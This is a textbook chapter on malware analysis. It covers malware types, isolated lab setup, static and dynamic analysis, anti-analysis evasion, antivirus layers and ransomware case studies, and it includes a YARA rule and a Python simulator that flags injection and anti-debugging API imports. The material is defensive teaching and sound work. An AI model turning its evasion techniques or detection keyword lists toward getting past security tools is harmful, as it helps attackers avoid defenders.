Chapter 15: Malware Analysis

Chapter 15: Malware Analysis#

“To defeat malware, you must first understand it.” malware analysis doctrine

Learning Objectives#

After completing this chapter, you will be able to:

Classify malware by type and describe the behavior and impact of each category.
Set up a safe, isolated analysis environment.
Perform static analysis to extract strings, imports, and metadata without executing a sample.
Perform basic dynamic analysis by observing system and network behavior during execution.
Identify common malware persistence mechanisms and their detection signatures.
Describe common evasion and anti-analysis techniques used by modern malware.
Produce a structured malware analysis report.
Explain how threat intelligence and YARA rules capture malware knowledge.

Key Terms#

Malware: malicious software designed to damage, disrupt, or gain unauthorized access.
Virus: malware that attaches to a legitimate file and spreads when that file is executed.
Worm: self-replicating malware that spreads across networks without user action.
Trojan: malware disguised as a legitimate program.
Ransomware: malware that encrypts victim files and demands payment for the key.
RAT: Remote Access Trojan; provides the attacker with remote control.
Rootkit: malware that hides its presence from the operating system and security tools.
Botnet: a network of compromised machines (bots) under central attacker control.
Dropper / Loader: malware that downloads or decrypts additional payloads.
Static analysis: analyzing a sample without executing it.
Dynamic analysis: executing a sample in a controlled environment and observing its behavior.
Sandbox: an isolated virtual environment for safe malware execution.
YARA: a pattern-matching language for malware identification.
IOC: Indicator of Compromise; artefact useful for detection or threat hunting.

15.1 Malware Taxonomy#

Viruses and Worms#

Viruses require a host file and spread when the infected file is executed. File infectors, macro viruses (embedded in Office documents), and boot-sector viruses are subcategories. Viruses were the dominant threat category before ubiquitous internet connectivity.

Worms are self-contained and propagate autonomously across networks by exploiting vulnerabilities or default credentials. The Morris Worm (1988) demonstrated catastrophic worm propagation on the early internet; WannaCry (2017) used the EternalBlue exploit (CVE-2017-0144) to spread across unpatched Windows networks worldwide, encrypting files as it went.

Trojans and RATs#

Trojans masquerade as legitimate software: a cracked game, a fake codec, a malicious email attachment. The user executes the Trojan voluntarily. A RAT (Remote Access Trojan) is a Trojan that establishes a persistent, attacker-controlled remote session, giving full control over the infected host: keylogging, screen capture, camera access, file management, and command execution.

Ransomware#

Ransomware encrypts victim files and demands a ransom for the decryption key. Modern ransomware campaigns combine encryption with exfiltration (double extortion) and sometimes threats of DDoS against the victim (triple extortion). The ransomware-as-a-service (RaaS) model allows operators to license the ransomware and infrastructure, taking a percentage of ransom payments, enabling technically unsophisticated actors to run sophisticated campaigns.

Ransomware Attack Chain#

Initial access via phishing, exploitation, or compromised credentials.
Privilege escalation to domain administrator.
Lateral movement to spread across the network.
Data exfiltration before encryption (double extortion).
Disable backups and shadow copies.
Deploy and execute ransomware payload.
Ransom note delivered.

Rootkits#

Rootkits operate at a high privilege level (kernel, hypervisor, firmware) and hide their presence by intercepting and modifying OS calls. A kernel rootkit that hooks the process-listing syscall can make itself invisible to ps, tasklist, and most security tools. Detection requires inspection from a known-good context: a memory forensics tool loaded into a clean VM, or a bootable forensic toolkit that bypasses the compromised OS.

Botnets and C2#

A botnet is a collection of compromised hosts (bots or zombies) under centralized attacker control. The bots communicate with a Command and Control (C2) server to receive instructions: send spam, participate in DDoS, mine cryptocurrency, or propagate ransomware. Modern C2 frameworks use HTTPS to blend with legitimate traffic, fast-flux DNS to rotate C2 IP addresses rapidly, and domain generation algorithms (DGA) to create thousands of possible C2 domains, making blocking impractical without threat intelligence.

15.2 Analysis Environment Setup#

Safe Lab Requirements#

Malware analysis requires a completely isolated environment where the sample cannot reach the internet, infect the analyst’s machine, or escape to the network. Requirements:

Network isolation: no connection to production networks; analysis network firewalled to a controlled fake internet or completely air-gapped.
Snapshot capability: take a clean snapshot before analysis; revert after each sample.
Controlled internet simulation: INetSim or Remnux tools simulate DNS, HTTP, SMTP, and IRC to allow malware to behave normally without reaching the real internet.
Host-only networking: the VM can reach the analyst’s host but nothing beyond.

REMnux and FlareVM#

REMnux (Linux) and FlareVM (Windows) are curated distributions pre-loaded with malware analysis tools. REMnux includes Wireshark, Volatility, Ghidra, YARA, INetSim, and hundreds of Python analysis libraries. FlareVM adds Windows-native tools: x64dbg, IDA Free, PE Studio, PEiD, and the Sysinternals Suite.

15.3 Static Analysis#

File Identification#

Before executing a sample, identify it from metadata alone:

Magic bytes: the first bytes of a file identify its format. PE files start with MZ (0x4D5A); ELF files with \x7fELF; ZIP/JAR/DOCX with PK. Malware often uses misleading extensions.
Hash lookup: compute the SHA-256 hash and query VirusTotal, MalwareBazaar, and Hybrid Analysis. A known hash gives immediate classification and prior analysis.
File size and entropy: high entropy (close to 8 bits/byte) indicates encryption or packing. Legitimate executables have lower entropy in their code section.

PE Analysis#

PE (Portable Executable) is the Windows executable format. Key fields:

Imports (IAT): functions imported from DLLs. CreateRemoteThread + VirtualAllocEx + WriteProcessMemory suggests process injection. RegSetValueEx suggests persistence. CryptEncrypt + FindFirstFile suggests ransomware.
Sections: .text (code), .data (initialized data), .rsrc (resources). A PE with only one section, a packed name (.upx0), or mismatched virtual-size/raw-size is likely packed.
Exports: functions the PE exports. Malware DLLs may export a minimal API for the loader.
Strings: extractable ASCII and Unicode strings often include URLs, registry keys, mutex names, error messages, and command-and-control infrastructure.

YARA Rules#

YARA matches patterns in files to classify malware families:

rule RansomwareCandidateStrings {
    strings:
        $enc1 = "Your files have been encrypted" nocase
        $enc2 = ".onion" nocase
        $crypt = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6F 6E 74 65 78 74 }
    condition:
        2 of them
}

YARA rules can match on strings, byte patterns, hex sequences, and regular expressions. The condition block combines matches with boolean logic.

Reverse Engineering Malware with Ghidra#

When strings and signatures are not enough, an analyst disassembles and decompiles the sample to read its logic directly. Always do this on an isolated analysis VM with no production network access (Section 15.2). A practical workflow follows.

Triage first. Before opening a disassembler, record the file hash, run file, list imports and sections (PE or ELF headers), and extract strings. Imports such as CryptAcquireContext, WinHttpOpen, or CreateRemoteThread already hint at encryption, network, or process-injection behavior.
Import into Ghidra. Create a project, import the binary, and let auto-analysis run. Ghidra disassembles the code and lifts it into its P-Code intermediate representation, which powers a built-in decompiler that shows readable C-like pseudocode beside the assembly.
Find the interesting code. Start from what you already know: double-click a suspicious string or an imported API in the Symbol Tree or Imports view to jump to every place it is used. Following CryptAcquireContext or a ransom-note string usually lands you in the encryption routine.
Read and annotate. In the Decompiler window, rename functions and variables (for example FUN_00401abc becomes encrypt_files), add comments, and define data types as you understand them. Good naming turns machine code into a readable narrative and is the heart of reverse engineering.
Trace behavior. Follow calls to map the program: configuration parsing, persistence (registry keys, scheduled tasks), command-and-control URLs, and the cryptographic scheme. Ghidra’s cross-references (“References to”) show how functions connect.
Confirm dynamically. Static reading tells you what the code can do; confirm it by detonating the sample in the sandbox (Section 15.4) or stepping through a debugger, watching the API calls and network traffic you predicted statically.

Choosing a Reverse-Engineering Tool#

Ghidra is a comprehensive, free option, but several decompilers each have distinct strengths:

Tool	Best for	Notes
Ghidra (NSA)	General cross-architecture analysis	Free and open source; P-Code IR; disassembler plus a native decompiler
IDA Pro (Hex-Rays)	Complex, commercial-grade analysis	Industry standard; polished pseudocode; Lumina signature matching; commercial
Binary Ninja	Scripting and workflow	Clean UI and a strong API; commercial, with a free cloud tier
JADX	Android applications	Lifts the Dalvik bytecode in APKs into readable Java source; open source
Cutter (rizin)	Lightweight free GUI	Open-source alternative; can use the Ghidra decompiler through a plugin

Match the tool to the target: a Windows PE or ARM firmware image suits Ghidra, IDA Pro, or Binary Ninja, while an Android APK is usually fastest to read in JADX. Reverse-engineer only samples you are authorized to analyze, and only inside an isolated lab.

15.4 Dynamic Analysis#

Behavioral Monitoring Tools#

During dynamic analysis, the analyst monitors:

Process activity: Process Monitor (ProcMon) logs file system, registry, and process/thread activity. New process spawning, registry Run key writes, and file creation in temp directories are suspicious.
Network activity: Wireshark captures all traffic; INetSim provides fake services for malware to interact with. DNS queries reveal C2 domains; HTTP requests reveal payloads.
API calls: API Monitor or a debugger traces every Windows API call the malware makes.

Common Malware Behaviors to Watch#

Behavior	What to observe	Significance
Persistence	Registry Run keys, Scheduled Tasks	Survival across reboots
Privilege escalation	UAC prompts, token impersonation	Gaining higher access
Process injection	CreateRemoteThread, WriteProcessMemory	Hiding in legitimate processes
C2 communication	Outbound HTTPS, DNS DGA queries	Command receipt, data exfiltration
Anti-VM check	CPUID, VMware registry keys, sleep	Evasion of sandbox analysis
Encryption	High CPU, file extensions changed	Ransomware payload execution

15.5 Anti-Analysis and Evasion Techniques#

VM and Sandbox Detection#

Many malware samples check whether they are running in a virtual machine or automated sandbox and behave differently (or do nothing) if detected. Techniques include: checking for VMware registry keys, querying CPUID for hypervisor bit, checking the number of running processes (sandboxes often have few), checking the disk size (sandboxes often have small disks), and sleeping for long periods to outlast automated analysis timeouts.

Packers and Obfuscators#

A packer compresses and encrypts the original payload, decrypting it at runtime. The static analysis sees only the decryption stub, not the real payload. Unpacking may require: running the sample until it unpacks itself (then dumping the decrypted PE from memory), using a known unpacker for common packers (UPX), or manual unpacking in a debugger.

Fileless Malware#

Fileless malware executes entirely in memory via legitimate system binaries (Living off the Land binaries, LOLBins): PowerShell, WMI, mshta, regsvr32, certutil. No file is written to disk, evading file-based detection. Detection requires memory forensics or behavioral monitoring of the LOLBin activity.

15.6 Malware Analysis Report Structure#

A structured analysis report includes:

Executive summary: one paragraph, family, capabilities, severity.
Sample metadata: file name, size, type, MD5/SHA-256, compile time.
Static analysis: imports, strings, sections, packer, YARA matches.
Dynamic analysis: persistence mechanisms, C2 communication, file activity.
IOCs: all extracted indicators (IPs, domains, hashes, file paths, registry keys).
MITRE ATT&CK mapping: technique IDs for each observed behavior.
Recommendations: detection rules (YARA, Sigma), remediation steps.

Worm / virus / Trojan: self-propagating, host-file-attached, and disguised malware.
Ransomware / RaaS / double extortion: file-encrypting extortion malware, sold as a service, that also leaks stolen data.
RAT / botnet / spyware / cryptominer / wiper / logic bomb: malware action categories.
Fileless malware: memory-resident malware abusing built-in tools to evade signatures.

15.7 Antivirus and Antimalware Defenses#

Having dissected how malware is built and analyzed, we turn to the defenses that try to stop it, the antivirus/antimalware layer. NIST’s Computer Security Resource Center defines malware as “a program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system, or otherwise annoying or disrupting the victim.” Malware is classified by how it propagates and what actions it performs, spanning attack kits, viruses, worms, and rootkits (the taxonomy of this chapter), and defenders face tens of thousands of new samples every day, which is why static signatures alone cannot keep up.

Antivirus technology has evolved through four generations: simple scanners that matched known signatures, heuristic engines that judged suspicious structure, activity/anomaly-based detection that watched behavior, and today’s next-generation (NextGen) AV that blends behavioral analytics and machine learning. Antimalware is best understood as the last line of defense: no single method is good enough by itself, NextGen capabilities are now necessary, and real-time scanning is essential rather than periodic sweeps.

Behaviorally, malware betrays itself through actions an antimalware engine can watch for: writing to restricted locations such as the registry or startup folders, modifying executables, opening/deleting/editing files in suspicious patterns, writing to the boot sector, and creating or injecting macros into documents. Two practical cautions close the topic: not all antivirus is created equal, so evaluate products before deploying, and while AV can be costly for an organization it remains a necessity, the final safety net beneath the firewalls, IDS/IPS, and detection methods of Chapters 11 and 12. The detection methods themselves (signature, heuristic, and anomaly/ML) are exactly those analyzed in Chapter 12, applied here at the endpoint.

Knowledge Check

According to NIST, what intent defines a program as malware?
List the four generations of antivirus technology in order.
Name three behaviors an antimalware engine watches for to identify malicious activity.

Answers: (1) Being inserted into a system, usually covertly, to compromise the confidentiality, integrity, or availability of the victim’s data, applications, or OS (or otherwise disrupt the victim). (2) Simple scanners, heuristics, activity/anomaly-based, and next-generation (NextGen) AV. (3) Any three of: writing to the registry or startup files, modifying executables, suspicious file open/delete/edit, writing to the boot sector, and creating/injecting document macros.

The Anti-* Family: Beyond Antivirus#

Antivirus is the best-known endpoint defense, but in practice it is one member of a family of complementary “anti-” controls, each tuned to a different threat, and a layered defense (defense-in-depth) runs several at once. Modern endpoint protection platforms (EPP) and endpoint detection and response (EDR) suites typically bundle most of them.

Antivirus / antimalware detect and remove malicious executables using the signature, heuristic, and anomaly methods of Chapter 12. The terms are now used almost interchangeably, “antimalware” simply emphasizing the broader modern scope (ransomware, trojans, worms, and more) beyond classic file viruses.
Anti-spyware targets software that covertly collects information, keyloggers, tracking cookies, info- stealers, and stalkerware, watching for the telltale behaviors of data capture and exfiltration rather than destruction.
Anti-phishing defends the human attack vector of Chapter 4: email and web filters that score messages and links, block known malicious and look-alike (typosquatted) domains, warn on credential-harvesting pages, and enforce sender-authentication checks (SPF, DKIM, DMARC). Because most intrusions begin with phishing, this control is disproportionately valuable.
Rootkit detectors hunt the hardest class of malware, rootkits that subvert the operating system (or below it) to hide their own presence (Chapter analysis of stealth malware). Because a kernel-level rootkit can lie to any tool running on the same system, detectors use techniques a compromised OS cannot easily fake: cross-view analysis (comparing what the OS reports against a lower-level enumeration to spot hidden files, processes, or registry keys), integrity checking against known-good baselines (Tripwire/AIDE-style), behavior monitoring, and offline or boot-time scanning from trusted media. Tools such as GMER, chkrootkit, and rkhunter illustrate the approach.

The unifying lesson is the precision-versus-recall trade-off seen throughout the book: every one of these tools balances false positives against false negatives, none is sufficient alone, and the strongest posture layers them with the network controls of Chapters 11 and 12, the detection methods that power them, and user awareness, so that what one layer misses another can catch.

15.8 A Field Guide to Malware Types#

The taxonomy section above introduced classification by propagation and action; here we name the families an analyst meets, because identifying the type guides both analysis and response. The classic distinction is by how it spreads: a virus attaches to a host file and runs when that file is opened; a worm spreads by itself across a network with no user action (the property that makes worms so explosive); and a Trojan masquerades as benign software the user installs willingly. Layered on top is what it does:

Ransomware encrypts the victim’s files (or whole disks) and demands payment, now usually with double extortion (also stealing data and threatening to leak it) and sold as Ransomware-as-a-Service (RaaS).
Rootkits subvert the operating system (or below it) to hide, the stealth class the rootkit detectors of this chapter target.
Remote Access Trojans (RATs) give an attacker interactive control of a host.
Botnets enlist many compromised machines under a command-and-control (C2) server for DDoS, spam, or fraud (Chapters 3 and 11).
Spyware/infostealers and keyloggers covertly harvest data and credentials.
Cryptominers steal compute to mine cryptocurrency (“cryptojacking”).
Wipers destroy data outright (sometimes disguised as ransomware), and logic bombs trigger on a condition.
Fileless malware lives only in memory and abuses built-in tools (PowerShell, WMI), leaving little on disk and defeating signature scanners, which is why memory forensics (Chapter 13) and behavior-based detection (Chapter 12) matter.

Most real malware is blended, a phishing Trojan that drops a RAT that deploys ransomware, so these labels describe capabilities a single sample often combines.

15.9 The Malware Lifecycle and a Ransomware Deep Dive#

Malware rarely acts in one step; it follows a lifecycle that mirrors the kill chain of Chapter 12 and the post-exploitation of Chapter 9: delivery (phishing, drive-by, or exploiting a public service), execution and installation, persistence, command and control, privilege escalation and lateral movement, and finally actions on objectives (encrypt, exfiltrate, destroy). Ransomware is the most consequential modern example and repays a closer look. A typical intrusion gains initial access (often through phishing or an exposed service, Chapter 8), escalates and spreads over hours, exfiltrates data first (for double extortion), disables backups and security tools, and only then detonates encryption across the estate. The encryption itself uses sound cryptography against the victim: a fast symmetric cipher (AES) per file with the file keys wrapped under the attacker’s public key (Chapter 2), so victims cannot recover files without the attacker’s private key.

        flowchart LR
    A[Phishing / exposed service] --> B[Execute + persist] --> C[Escalate + spread]
    C --> D[Exfiltrate data] --> E[Disable backups + tools] --> F[Encrypt everything] --> G[Ransom + leak threat]

The defenses follow directly from the lifecycle and from earlier chapters: phishing-resistant authentication and user training (Chapter 4), patching and least privilege to limit spread (Chapters 1 and 9), EDR/behavioral detection to catch the staging (Chapter 12), and, decisively, tested, offline/immutable backups so that encryption is a recoverable outage rather than a catastrophe (the durability and resiliency of Chapter 17). Paying ransoms is discouraged, funds the ecosystem, may be legally restricted, and does not guarantee recovery.

Notable Ransomware Strains: LockBit 3.0 and Rorschach#

Two strains illustrate how modern ransomware industrializes the lifecycle above. LockBit 3.0 (also called LockBit Black), which appeared in 2022, was one of the most prolific ransomware-as-a-service (RaaS) operations of the early 2020s. It ran an affiliate program, used AES with elliptic-curve key wrapping, added cryptocurrency options such as Zcash, and even advertised a “bug bounty” inviting researchers to report flaws in its own code. Its builder leaked in September 2022, letting other criminals create custom variants. In February 2024 an international law-enforcement action named Operation Cronos, led by the UK National Crime Agency and the U.S. FBI with partners, seized LockBit’s infrastructure, servers, and accounts and disrupted the operation, later naming its lead operator.

Rorschach (also tracked as BabLock), reported by Check Point Research in 2023, shows how fast and stealthy encryption has become. At disclosure it was the fastest encryptor publicly measured, achieved through partial (intermittent) encryption of each file, efficient multithreading, and a hybrid scheme combining the curve25519 key exchange with the HC-128 stream cipher. It was delivered by DLL side-loading that abused a digitally signed component of a legitimate security product to load its malicious loader, used direct system calls to evade monitoring, and could self-propagate across a Windows domain, skipping machines configured with Commonwealth of Independent States (CIS) languages.

Free Recovery: The No More Ransom Project#

Before paying anyone, victims should check whether the files can be recovered for free. No More Ransom (https://www.nomoreransom.org), launched in 2016 by Europol’s European Cybercrime Centre, the Dutch National Police, and cybersecurity companies, is a global initiative that hosts hundreds of free decryption tools. Its Crypto Sheriff tool lets a victim upload the ransom note or a sample encrypted file to identify the exact strain and, if a decryptor exists, download it at no cost. The portal also links victims to report the attack to law enforcement in their region, which aids investigations and supports the incident-response and breach-notification duties of Chapter 14. Checking No More Ransom is a standard early step in ransomware response, alongside isolating affected systems and restoring from tested, offline backups, and it reinforces the chapter’s central point: paying is a last resort, not a recovery plan.

Chapter Summary#

This chapter is a practical guide to understanding malicious software. It set out a malware taxonomy and the safe analysis environment, then developed static and dynamic analysis and the anti-analysis and evasion techniques that malware uses to resist both. It described how to structure a malware analysis report, surveyed antivirus and antimalware defenses, and provided a field guide to malware types before a deep dive into the malware lifecycle and modern ransomware. The central message is that careful, isolated analysis turns an opaque sample into actionable indicators and that defenders must account for code that actively fights inspection.

Why This Matters#

Malware analysis transforms an unknown threat into a known one. Every IOC extracted, every behavior documented, and every YARA rule written benefits every organization using that intelligence. Analysis also drives detection engineering: a malware family’s unique import combinations, mutex names, or C2 patterns become Snort signatures, YARA rules, and SIEM correlation rules that detect the next infection before it spreads.

News in Focus: WannaCry and the Worm That Used a Leaked Exploit (2017)#

WannaCry, in May 2017, is the case that fused worm, ransomware, and a leaked nation-state exploit into a global incident. It spread automatically using EternalBlue, an exploit of a Server Message Block (SMBv1) vulnerability (CVE-2017-0144) that had been developed by a national intelligence agency and then leaked, and for which Microsoft had issued a patch (MS17-010) two months earlier. Unpatched Windows systems worldwide, including the UK’s National Health Service, were encrypted within hours; the spread was slowed when a researcher registered a “kill-switch” domain hard-coded in the malware. The episode distilled several of this book’s lessons at once: the danger of unpatched systems and legacy protocols, the dual-use and leakage risk of offensive tooling (Chapter 18), the destructive power of worm-like propagation, and the fact that the patch existed but had not been applied, exactly the patch-management gap the GreyNoise edge data in Chapter 8 quantified. (Figures and attributions are per public reporting on the incident.)

Knowledge Check

What property distinguishes a worm from a virus and a Trojan?
In a modern ransomware intrusion, why does the attacker exfiltrate data and disable backups before encrypting?
Why is fileless malware hard for traditional antivirus to catch, and which two techniques help?

Answers: (1) A worm self-propagates across networks with no user action; a virus needs a host file to be opened, and a Trojan needs the user to run disguised software. (2) Exfiltration enables double extortion (threatening to leak data even if files are restored), and disabling backups removes the victim’s ability to recover without paying. (3) It runs in memory and abuses legitimate built-in tools, leaving few on-disk signatures; memory forensics (Chapter 13) and behavior-based detection/EDR (Chapter 12) help.

News in Focus: Fileless and Living-off-the-Land Attacks#

The discovery of sophisticated ransomware variants using legitimate management tools (PSExec, WMI, RDP) rather than traditional malware executables challenged organizations that relied on antivirus detection. These campaigns were classified as fileless or living-off-the-land because the malicious activity was performed by binaries already present on every Windows system. Detection required behavioral analysis rather than signature matching, driving the market shift from antivirus to endpoint detection and response (EDR).

# Chapter 15 -- Static analysis simulation: PE imports, strings, entropy, YARA

import math, re
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0
    counts = Counter(data)
    total = len(data)
    return -sum((c/total)*math.log2(c/total) for c in counts.values())

# Simulated PE import analysis
suspicious_imports = {
    "CreateRemoteThread":   "Process injection (T1055)",
    "VirtualAllocEx":       "Allocate memory in remote process",
    "WriteProcessMemory":   "Write to remote process memory",
    "RegSetValueEx":        "Registry persistence (T1547)",
    "WinExec":              "Execute commands",
    "CryptEncrypt":         "Encryption -- possible ransomware",
    "FindFirstFile":        "File enumeration -- possible ransomware",
    "InternetOpenUrl":      "Network C2 communication",
    "IsDebuggerPresent":    "Anti-debugging check (T1622)",
}

benign_imports = ["GetLastError", "HeapAlloc", "CreateFile", "CloseHandle",
                  "GetModuleHandleA", "LoadLibraryA", "GetProcAddress"]

print("=== Simulated PE Import Analysis ===")
sample_imports = list(suspicious_imports.keys())[:6] + benign_imports[:4]

print(f"\n  Total imports found: {len(sample_imports)}")
print(f"  {'Import':<28} {'Suspicion'}")
print("  " + "-"*70)
for imp in sample_imports:
    note = suspicious_imports.get(imp, "Benign")
    flag = " <-- SUSPICIOUS" if imp in suspicious_imports else ""
    print(f"  {imp:<28} {note}{flag}")

# Entropy analysis
import random
random.seed(42)
packed_data   = bytes([random.randint(0,255) for _ in range(4096)])  # high entropy
unpacked_data = (b"This is a normal text string with low entropy. " * 100)[:4096]
code_section  = bytes([random.randint(0,127) for _ in range(4096)])  # medium entropy

print(f"\n=== Entropy Analysis ===")
print(f"  Packed/encrypted section : {shannon_entropy(packed_data):.2f} bits/byte  (>7.5 = packed)")
print(f"  Code section             : {shannon_entropy(code_section):.2f} bits/byte  (typical)")
print(f"  Data/strings section     : {shannon_entropy(unpacked_data):.2f} bits/byte  (normal)")

# YARA-like rule simulation
print("\n=== YARA Rule Match Simulation ===")

class YaraRule:
    def __init__(self, name, strings, condition_count):
        self.name = name
        self.strings = strings
        self.condition_count = condition_count

    def match(self, content: str) -> bool:
        matched = sum(1 for s in self.strings if s.lower() in content.lower())
        return matched >= self.condition_count

rules = [
    YaraRule("RansomwareStrings",
             ["your files have been encrypted", ".onion", "bitcoin", "decryption key"],
             condition_count=2),
    YaraRule("RemoteAccessTrojan",
             ["CreateRemoteThread", "VirtualAllocEx", "WriteProcessMemory"],
             condition_count=2),
    YaraRule("AntiAnalysis",
             ["IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"],
             condition_count=1),
]

samples = {
    "sample_a.exe": "CreateRemoteThread VirtualAllocEx WriteProcessMemory IsDebuggerPresent",
    "sample_b.exe": "Your files have been encrypted. Send bitcoin to .onion address for decryption key.",
    "sample_c.exe": "GetLastError HeapAlloc CreateFile CloseHandle",
}

for fname, content in samples.items():
    hits = [r.name for r in rules if r.match(content)]
    result = ", ".join(hits) if hits else "No match"
    print(f"  {fname}: {result}")

=== Simulated PE Import Analysis ===

  Total imports found: 10
  Import                       Suspicion
  ----------------------------------------------------------------------
  CreateRemoteThread           Process injection (T1055) <-- SUSPICIOUS
  VirtualAllocEx               Allocate memory in remote process <-- SUSPICIOUS
  WriteProcessMemory           Write to remote process memory <-- SUSPICIOUS
  RegSetValueEx                Registry persistence (T1547) <-- SUSPICIOUS
  WinExec                      Execute commands <-- SUSPICIOUS
  CryptEncrypt                 Encryption -- possible ransomware <-- SUSPICIOUS
  GetLastError                 Benign
  HeapAlloc                    Benign
  CreateFile                   Benign
  CloseHandle                  Benign

=== Entropy Analysis ===
  Packed/encrypted section : 7.96 bits/byte  (>7.5 = packed)
  Code section             : 6.98 bits/byte  (typical)
  Data/strings section     : 3.91 bits/byte  (normal)

=== YARA Rule Match Simulation ===
  sample_a.exe: RemoteAccessTrojan, AntiAnalysis
  sample_b.exe: RansomwareStrings
  sample_c.exe: No match

Review Questions (MCQ)#

Q1. A worm differs from a virus primarily in that a worm: A. Is harder to detect B. Does not require a host file and propagates autonomously C. Only targets Windows D. Always encrypts files

Q2. Double extortion ransomware combines encryption with: A. Phishing B. Exfiltration of data as a second ransom leverage C. DDoS D. Rootkit installation

Q3. High entropy (close to 8 bits/byte) in a PE section suggests: A. A legitimate executable B. The section is encrypted or packed C. The file is a PDF D. The file has no imports

Q4. The Windows API function pair most indicative of process injection is: A. RegSetValueEx + CreateFile B. VirtualAllocEx + CreateRemoteThread + WriteProcessMemory C. CryptEncrypt + FindFirstFile D. WinExec + GetProcAddress

Q5. YARA rules are used to: A. Decrypt malware B. Match file patterns to classify malware families C. Block network traffic D. Analyze network captures

Q6. A rootkit at the kernel level is best detected by: A. Running antivirus from within the compromised OS B. Inspection from a known-good external context (live boot, memory forensics) C. Checking the registry for Run keys D. Examining browser history

Q7. Domain Generation Algorithms (DGA) in C2 make blocking difficult because: A. They use HTTPS B. They generate thousands of potential C2 domains, making blocklists impractical C. They encrypt DNS traffic D. They run on port 443

Q8. Fileless malware evades detection by: A. Using encrypted executables B. Executing only in memory via legitimate system binaries (LOLBins) C. Disabling antivirus on startup D. Using rootkit techniques

Q9. INetSim in a malware analysis lab is used to: A. Capture network traffic B. Simulate internet services so malware can behave normally without reaching the real internet C. Unpack malware D. Write YARA rules

Q10. The ransomware attack chain step that precedes encryption is: A. Initial access B. Privilege escalation C. Disabling backups and shadow copies D. Exfiltration

Answers: Q1 B, Q2 B, Q3 B, Q4 B, Q5 B, Q6 B, Q7 B, Q8 B, Q9 B, Q10 C.

Lab Assignment#

Part A – Static analysis: Download a benign PE file (e.g., a portable app from a trusted source). Use strings (Linux) or CFF Explorer (Windows) to extract strings. Identify: any URLs, registry keys, or suspicious API imports. Compute its SHA-256 and query VirusTotal.

Part B – Sandbox submission: Submit a known benign file (or a purposely benign script you write) to any.run or Hybrid Analysis. Document the behavioral report: file activity, registry activity, network connections, and any detection verdicts. Explain what each reported behavior means.

Part C – YARA rule writing: Write three YARA rules: one for a hypothetical ransomware sample (based on the string patterns in the chapter), one for a RAT (based on import combinations), and one for an anti-debugging sample. Test each rule using the simulator above with sample strings you compose.

Part D – MITRE ATT&CK mapping: For a ransomware incident with the following behaviors (spear phishing initial access, PowerShell execution, LSASS dump, lateral movement via PsExec, Shadow Copy deletion, file encryption), map each behavior to its ATT&CK technique ID and tactic.

References#

NIST Computer Security Resource Center (CSRC) glossary: definition of malware.
Practical Computer Security (Course 3): lecture on Antivirus and Antimalware (history, detection generations, identification behaviors).
Email authentication standards SPF, DKIM, and DMARC; rootkit-detection tools (GMER, chkrootkit, rkhunter).
Microsoft Security Bulletin MS17-010; CVE-2017-0144 (EternalBlue / SMBv1). Reporting on the WannaCry outbreak (May 2017).
Sikorski, M., and Honig, A. Practical Malware Analysis. No Starch Press.
No More Ransom project (Europol European Cybercrime Centre, Dutch National Police, and partners). Crypto Sheriff and free decryption tools. https://www.nomoreransom.org
Check Point Research (2023). Rorschach: A New Sophisticated and Fast Ransomware.
UK National Crime Agency (2024). Operation Cronos: disruption of the LockBit ransomware group.
Reverse-engineering tools: Ghidra (NSA), IDA Pro (Hex-Rays), Binary Ninja, JADX, and Cutter (rizin).